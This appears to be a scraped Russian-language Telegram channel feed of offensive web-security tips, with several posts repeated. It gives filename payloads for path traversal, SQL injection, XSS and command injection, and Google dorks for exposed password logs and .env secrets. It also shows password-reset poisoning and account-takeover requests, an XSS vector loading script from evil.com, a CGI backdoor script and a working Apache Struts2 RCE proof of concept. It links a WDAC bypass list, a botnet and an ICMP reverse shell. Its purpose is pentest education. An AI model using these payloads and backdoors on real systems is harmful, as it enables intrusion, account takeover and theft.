📨 Получение других уязвимостей при загрузке файла
При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:
▫️
▫️
▫️
▫️
Эти полезные нагрузки могут вызвать дополнительные уязвимости.
#web
При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения:
▫️
../../../tmp/lol.png -> для уязвимости Path Traversal▫️
sleep(10)-- -.jpg -> для SQL-инъекции▫️
<svg onload=alert(document.domain)>.jpg/png -> для XSS▫️
; sleep 10; -> для command injectionЭти полезные нагрузки могут вызвать дополнительные уязвимости.
#web
📖 UltimateWDACBypassList
Централизованный ресурс, содержащий обширный список техник обхода Windows Defender Application Control (WDAC) с описанием и ссылками для каждой техники.
#av #redteam
Ссылка на GitHub
Централизованный ресурс, содержащий обширный список техник обхода Windows Defender Application Control (WDAC) с описанием и ссылками для каждой техники.
#av #redteam
Ссылка на GitHub
📚 Udemy: Pentesting and Security Web Application
Бесплатно только сегодня! Первоначальная цена курса 7 490 руб.
Скидка 100%
#web
Ссылка на курс
Бесплатно только сегодня! Первоначальная цена курса 7 490 руб.
Скидка 100%
Промокод - EARLYBIRD
#web
Ссылка на курс
Udemy
Pentesting with Daniel Slater (Ethical Hacking/Web Security)
Join 170,000+ students - Learn cyber security, penetration testing (pentesting) and ethical hacking
🔎 Небольшая подборка интересных Google дорков
▫️FTP серверы и сайты
▫️Лог файлы с паролями:
▫️Списки с email адресами:
▫️Открытые камеры:
#web #google
▫️FTP серверы и сайты
intitle:“index of” inurl:ftp after:2018
▫️Лог файлы с паролями:
allintext:password filetype:log after:2018
▫️
filetype:env “DB_PASSWORD” after:2018
▫️Списки с email адресами:
filetype:xls inurl:“email.xls”
▫️Открытые камеры:
inurl:top.htm inurl:currenttime
#web #google
👍1
🔑 Техника обхода для Password poisoning
С помощью данной атаки вызывается функция сброса пароля, но доменное имя в URL ссылки для сброса будет указывать на сервер злоумышленника, что может привести к захвату учетной записи пользователя. Более подробное описание атаки по ссылке.
▫️Обычный запрос:
Запрос:
Запрос:
▫️Техника обхода:
Запрос:
В случае успеха, это может привести к серьезным ошибкам, вызывающим утечку токена сброса и, как следствие, захват учетной записи и повышение привилегий. Вот реальный отчет об ошибке, подробно описывающий последствия атаки.
#web
С помощью данной атаки вызывается функция сброса пароля, но доменное имя в URL ссылки для сброса будет указывать на сервер злоумышленника, что может привести к захвату учетной записи пользователя. Более подробное описание атаки по ссылке.
▫️Обычный запрос:
Запрос:
POST /password-reset?user=123 HTTP/1.1
Host: target.com
Ссылка для сброса:https://target.com/reset-link=1g2f3guy23g
▫️Стандартный вид атаки (внедрение заголовка хоста):Запрос:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com
Ссылка для сброса:none
Error 404 - request blocked
Видим, что запрос заблокирован. Пробуем обойти блокировку.▫️Техника обхода:
Запрос:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com
Ссылка для сброса:https://evil.com/reset-link=1g2f3guy23g
Обратите внимание, что при обходе мы использовали абсолютный URL-адрес в запросе POST. В таком случае заголовок Host следует полностью игнорировать. Однако некоторые серверные (back-end) системы все еще обрабатывают его, а front-end не блокирует внедрение заголовка хоста в случае абсолютных URL-адресов. По сути, это просто несогласованность.В случае успеха, это может привести к серьезным ошибкам, вызывающим утечку токена сброса и, как следствие, захват учетной записи и повышение привилегий. Вот реальный отчет об ошибке, подробно описывающий последствия атаки.
#web
portswigger.net
Password reset poisoning | Web Security Academy
Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into generating a password reset link pointing to a domain ...
📍Точки преобразования полезной нагрузки для обхода WAF
Нашёл в сети наглядное изображение, показывающее различные способы преобразования полезной нагрузки в теге
Достаточно вписать в указанное место один из представленных вариантов и получить новую полезную нагрузку.
#web #xss
Нашёл в сети наглядное изображение, показывающее различные способы преобразования полезной нагрузки в теге
<a> для обхода некоторых средств защиты веб-приложений.Достаточно вписать в указанное место один из представленных вариантов и получить новую полезную нагрузку.
#web #xss
📌 Изменяем значение href для обхода WAF
Бывают ситуации, когда мы можем контролировать значение
На схеме ниже показано, как использовать различные типы кодирования
#xss #web
Оригинал изображения
Бывают ситуации, когда мы можем контролировать значение
href в HTML теге <a>. Это место отлично подходит для XSS.На схеме ниже показано, как использовать различные типы кодирования
href для обхода некоторых средств защиты веб-приложений.#xss #web
Оригинал изображения
🔐 Захват учетной записи из-за слабого шифрования
В этой мини статье будет рассмотрен основной принцип получения доступа к аккаунтам на сайтах, имеющих функцию входа через одноразовый пароль.
#web
Читать статью
В этой мини статье будет рассмотрен основной принцип получения доступа к аккаунтам на сайтах, имеющих функцию входа через одноразовый пароль.
#web
Читать статью
Telegraph
Захват учетной записи из-за слабого шифрования
Вступление Всем привет! В этой небольшой статье мы рассмотрим яркий пример, когда из за слабого шифрования мы можем получить доступ к учетной записи. Уязвимость была найдена в приватной программе, поэтому все идентификаторы сайта скрыты. Поиск уязвимости…
SHADOW:Group
📨 Получение других уязвимостей при загрузке файла При тестировании функций загрузки файлов в веб-приложении попробуйте установить для имени файла следующие значения: ▫️ ../../../tmp/lol.png -> для уязвимости Path Traversal ▫️ sleep(10)-- -.jpg -> для SQL…
📥 Хранимая XSS при загрузке файла в Apple ITunes стоимостью 5000$
Недавно я рассказывал вам о том, что каждую форму загрузки файла рекомендуется проверять на сторонние уязвимости, размещая полезные нагрузки непосредственно в имени файла.
И вот, изучая различные отчеты, наткнулся на пример такой уязвимости ни где нибудь, а на сайте такого гиганта, как Apple.
Автор, заметивший баг, сделал видео, в котором наглядно показал эксплуатацию данной уязвимости.
#web #xss
Смотреть видео
Недавно я рассказывал вам о том, что каждую форму загрузки файла рекомендуется проверять на сторонние уязвимости, размещая полезные нагрузки непосредственно в имени файла.
И вот, изучая различные отчеты, наткнулся на пример такой уязвимости ни где нибудь, а на сайте такого гиганта, как Apple.
Автор, заметивший баг, сделал видео, в котором наглядно показал эксплуатацию данной уязвимости.
#web #xss
Смотреть видео
YouTube
Apple iTunes Service Stored XSS Vulnerability - Bug Bounty - $5,000
Hi there,
I can finally disclose the security vulnerability I found in Apple about 4 months ago as it has been fixed :)
Vuln name: Stored XSS
Grade: P2
Bounty: $5,000
Thanks for watching!
Website: www.ertugrulozdemir.com/
Twitter: www.twitter.com/ertugrulphp…
I can finally disclose the security vulnerability I found in Apple about 4 months ago as it has been fixed :)
Vuln name: Stored XSS
Grade: P2
Bounty: $5,000
Thanks for watching!
Website: www.ertugrulozdemir.com/
Twitter: www.twitter.com/ertugrulphp…
🦠 HTTP ботнет на C++ с открытым исходным кодом
Uboat - PoC HTTP-ботнета, предназначенный для репликации реального боевого коммерческого ботнета.
Основная цель создания этого проекта состоит в том, чтобы помочь исследователям в области безопасности улучшить понимание устройства и работы коммерческих HTTP ботнетов.
#malware
Ссылка на GitHub
Uboat - PoC HTTP-ботнета, предназначенный для репликации реального боевого коммерческого ботнета.
Основная цель создания этого проекта состоит в том, чтобы помочь исследователям в области безопасности улучшить понимание устройства и работы коммерческих HTTP ботнетов.
#malware
Ссылка на GitHub
📑 Переходим от LFI к удаленному выполнению кода
Статья описывает несколько способов, благодаря которым вы можете получить полноценное RCE на сайтах с LFI.
#web #lfi #rce
Читать статью
Статья описывает несколько способов, благодаря которым вы можете получить полноценное RCE на сайтах с LFI.
#web #lfi #rce
Читать статью
Telegraph
Переходим от LFI к удаленному выполнению кода
Введение Включение локального файла (LFI) - одна из самых популярных атак в веб-приложениях. В этой статье мы не собираемся сосредотачиваться на том, что такое LFI-атаки или как мы можем их выполнять, а вместо этого мы посмотрим, как можно получить командную…
⚙️ Расширение Google Chrome для поиска DOM XSS.
Untrusted-types - это расширение для Google Chrome, которое использует Trusted Types для поиска DOM XSS.
Инструмент регистрирует манипуляции с DOM, которые могут привести к XSS. Ниже представлено видео, в котором автор рассказывает о работе с этим расширением.
#xss #web
Смотреть видео
Untrusted-types - это расширение для Google Chrome, которое использует Trusted Types для поиска DOM XSS.
Инструмент регистрирует манипуляции с DOM, которые могут привести к XSS. Ниже представлено видео, в котором автор рассказывает о работе с этим расширением.
#xss #web
Смотреть видео
YouTube
Finding DOMXSS with DevTools | Untrusted Types Chrome Extension
In this video, Filedescriptor introduces his Chrome Extension "Untrusted Types" that abuses Trusted Types and demonstrates how easy it is to find DOMXSS using it.
Untrusted Types GitHub repo: https://github.com/filedescriptor/untrusted-types
Google's Firing…
Untrusted Types GitHub repo: https://github.com/filedescriptor/untrusted-types
Google's Firing…
Forwarded from Кавычка (Bo0oM)
После эксплутации инъекции в sql с помощью следующего email адреса
невольно задумываешься: а какого хера это вообще пропустило как валидный email?
В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.
Поэтому, следующая магия:
Провалидирует и вполне законно вернет мыло с вектором атаки:
А там как дальше разработчики его отображают - отдельный вопрос.
"'-sleep(5)-'"@mail.localневольно задумываешься: а какого хера это вообще пропустило как валидный email?
В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.
Поэтому, следующая магия:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”Провалидирует и вполне законно вернет мыло с вектором атаки:
"'--><script/src=//evil.com></script>"@example.comА там как дальше разработчики его отображают - отдельный вопрос.
🖇 Краткий экскурс по захвату поддоменов
Используя захват поддомена, злоумышленники могут отправлять фишинговые электронные письма с легитимного домена, выполнять межсайтовые сценарии (XSS) или наносить ущерб репутации бренда, связанного с доменом.
#web #sto
Читать статью
Используя захват поддомена, злоумышленники могут отправлять фишинговые электронные письма с легитимного домена, выполнять межсайтовые сценарии (XSS) или наносить ущерб репутации бренда, связанного с доменом.
#web #sto
Читать статью
Telegraph
Краткий экскурс по захвату поддоменов
Введение Захват субдомена - это процесс регистрации несуществующего доменного имени для получения контроля над другим доменом. Наиболее распространенный сценарий этого процесса: Имя домена (например, sub.example.com ) использует запись CNAME для другого домена…
⛓ icmpdoor - ICMP reverse shell, написанный на Python3
icmpdoor может туннелировать скрытый ICMP канал для управления скомпрометированной машиной. Более подробно про работу с инструментом можно ознакомиться в блоге автора.
Фильтрация ICMP трафика настраивается редко, что позволяет злоумышленникам обходить брандмауэры. В прошлом использование ICMP в качестве бэкдора совершалось по крайней мере одной APT (Advanced Persistent Threat) группой.
#redteam #malware
Ссылка на Github
icmpdoor может туннелировать скрытый ICMP канал для управления скомпрометированной машиной. Более подробно про работу с инструментом можно ознакомиться в блоге автора.
Фильтрация ICMP трафика настраивается редко, что позволяет злоумышленникам обходить брандмауэры. В прошлом использование ICMP в качестве бэкдора совершалось по крайней мере одной APT (Advanced Persistent Threat) группой.
#redteam #malware
Ссылка на Github
📮 Добавление электронного адреса в передаваемый параметр для захвата аккаунта
Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
▫️Добавление адреса атакующего в параметр через «&»:
▫️Добавление адреса атакующего в параметр через «%20»:
▫️Добавление адреса атакующего в параметр через «|»:
▫️Добавление адреса атакующего в параметр через «cc»:
▫️Добавление адреса атакующего в параметр через «bcc»:
▫️Добавление адреса атакующего в параметр через «,»:
▫️Добавление адреса атакующего в json массив:
Реальный пример такой уязвимости можно посмотреть по этой ссылке.
#web
Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт.
Можно попробовать перехватить запрос и добавить туда ещё один email адрес. Таким образом, на некоторых сайтах мы можем добиться отправки письма с ссылкой для сброса на подконтрольный нам адрес почты:
▫️Добавление адреса атакующего в параметр через «&»:
POST /resetPassword
[...]
email=victim@mail.com&email=hacker@mail.com
▫️Добавление адреса атакующего в параметр через «%20»:
POST /resetPassword
[...]
email=victim@mail.com%20email=hacker@mail.com
▫️Добавление адреса атакующего в параметр через «|»:
POST /resetPassword
[...]
email=victim@mail.com|email=hacker@mail.com
▫️Добавление адреса атакующего в параметр через «cc»:
POST /resetPassword
[...]
email="victim@mail.com%0d%0acc:hacker@mail.com"
▫️Добавление адреса атакующего в параметр через «bcc»:
POST /resetPassword
[...]
email="victim@mail.com%0d%0abcc:hacker@mail.com"
▫️Добавление адреса атакующего в параметр через «,»:
POST /resetPassword
[...]
email="victim@mail.com",email="hacker@mail.com"
▫️Добавление адреса атакующего в json массив:
POST /resetPassword
[...]
{"email":["victim@mail.com","hacker@mail.com"]}
Реальный пример такой уязвимости можно посмотреть по этой ссылке.
#web
🐍 CGI бэкдор с помощью простого Python сервера
Знаете ли вы, что простой веб-сервер Python может запускать сценарии CGI? В результате вы можете превратить этот удобный маленький веб-сервер в бэкдор.
#python
Знаете ли вы, что простой веб-сервер Python может запускать сценарии CGI? В результате вы можете превратить этот удобный маленький веб-сервер в бэкдор.
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi?whoami"#python
SHADOW:Group
📮 Добавление электронного адреса в передаваемый параметр для захвата аккаунта Один из стандартных способов восстановления пароля - это отправка ссылки для сброса на адрес электронной почты, к которой привязан аккаунт. Можно попробовать перехватить запрос…
🔑 Захват аккаунта с помощью изменения адреса почты и пароля любого пользователя через API параметры
Ещё один способ, который может сработать при захвате аккаунта на некоторых сайтах.
▫️Атакующий должен войти со своего аккаунта и запустить функцию смены пароля;
▫️Запускаем Burp Suite и ловим запрос;
▫️После перехвата запроса, отправляем его в Repeater и пробуем изменить параметры Email и Password.
#web
Ещё один способ, который может сработать при захвате аккаунта на некоторых сайтах.
▫️Атакующий должен войти со своего аккаунта и запустить функцию смены пароля;
▫️Запускаем Burp Suite и ловим запрос;
▫️После перехвата запроса, отправляем его в Repeater и пробуем изменить параметры Email и Password.
POST /api/changepass
[...]
("form":{"email":"victim@mail.com","password":"12345678"})
#web
🧨 CVE-2020-17530: Удалённое выполнение кода в Apache Struts2
Степень серьезности - критическая. PoC стал общедоступным и может оказать значительное и обширное влияние. Для тех, кто не успел ознакомиться, код ниже.
Python PoC:
#rce #cve
Степень серьезности - критическая. PoC стал общедоступным и может оказать значительное и обширное влияние. Для тех, кто не успел ознакомиться, код ниже.
Python PoC:
# 2.0.0 ~ 2.5.25
import requests
url = "http://127.0.0.1:8080/struts2_showcase_war/hello.action"
data = {
"name": '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("/System/Applications/Calculator.app/Contents/MacOS/Calculator")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}'
}
res = requests.post(url, data=data)#rce #cve